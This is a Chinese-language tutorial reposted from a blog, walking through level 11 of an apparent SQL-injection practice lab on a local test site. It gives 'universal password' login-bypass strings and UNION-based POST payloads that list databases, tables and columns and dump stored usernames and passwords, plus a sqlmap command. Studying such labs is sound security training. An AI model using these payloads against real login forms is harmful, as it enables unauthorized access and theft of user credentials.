标签:sqlmap 语句 用户名 users GET passwd 密码 select 注入
从Less11开始和前面的有所不同最大的一点就是:前面的都是Get方法,而现在开始的是POST方法。
Less-11实验主要是:单引号字符注入
从登陆界面的样子,最直接想到的就是“万能密码”。
我们先看一下源码,发现sql语句是这样的:
从这个代码里我们看到用户的地方输入用户名,而不能在用户名后闭合用前面的%23来注释后面的,如果注释了整个语句会出错。所以要保证整个语句正确一般有两种方法,要么在用户名位置构造返回是ture,要么在密码地方构造。
- 在用户名位置构造
构造的用户名在数据库中要存在,这里我们猜测会不用admin这样的用户名。
在用户名位置输入 admin' or '1'='1 密码位置随便输入任意内容
点击提交后,我们可以以用户admin登录进入
- 在密码位置构造
在用户名位置输入任意名字, 密码位置随便输入sdfsd' or '1'='1
点击提交后,我们发现这里以数据库users表的第一个用户登录进去的。
这里出现这样的原因其实通过分析构造的两个语句就能看出来了:
select * from users where username='admin' or '1'='1' and
password='fsdfs'
如果这里不用admin用的别的,那么接下来语句就是ture,语句被执行,返回的是空内容;所以username中的内容表中必须有。
select * from users where username='aaa' and password='sdfsd' or '1'='1'
而这一句其实等同于 select * from users where '1'='1' ,这就是直接执行select * from
users 无任何条件。
大家就明白为什么在密码处构造不需要知道用户名是什么,也就是常说的万能密码,但登陆进去的一定是第一个用户。
less 11
post方法单引号绕过报错注入
这关跟之前get方法的差不了多少,只是get方法换成了post方法
post数据uname=1' union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=1可以得到
uname=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema="security"#&passwd=1
uname=1' union select 1,group_concat(column_name) from information_schema.columns where table_name="users"#&passwd=1
uname=1' union select 1,group_concat(concat_ws(char(32,58,32),id,username,password)) from users#&passwd=1
其中#表示注释,后面的SQL语句都不起作用了!
less-11
uname和passwd直接带入查询,万能密码
sqlmap自动搜索表单,或者抓包后用-r参数
然后:
sqlmap -u "http://localhost/Less-11/" --data "uname=1&passwd=11&submit=Submit" --dbs
注入方法和GET类似,无非是加了一个--data而已!!!
标签:sqlmap,语句,用户名,users,GET,passwd,密码,select,注入 来源: https://www.cnblogs.com/bonelee/p/14883168.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。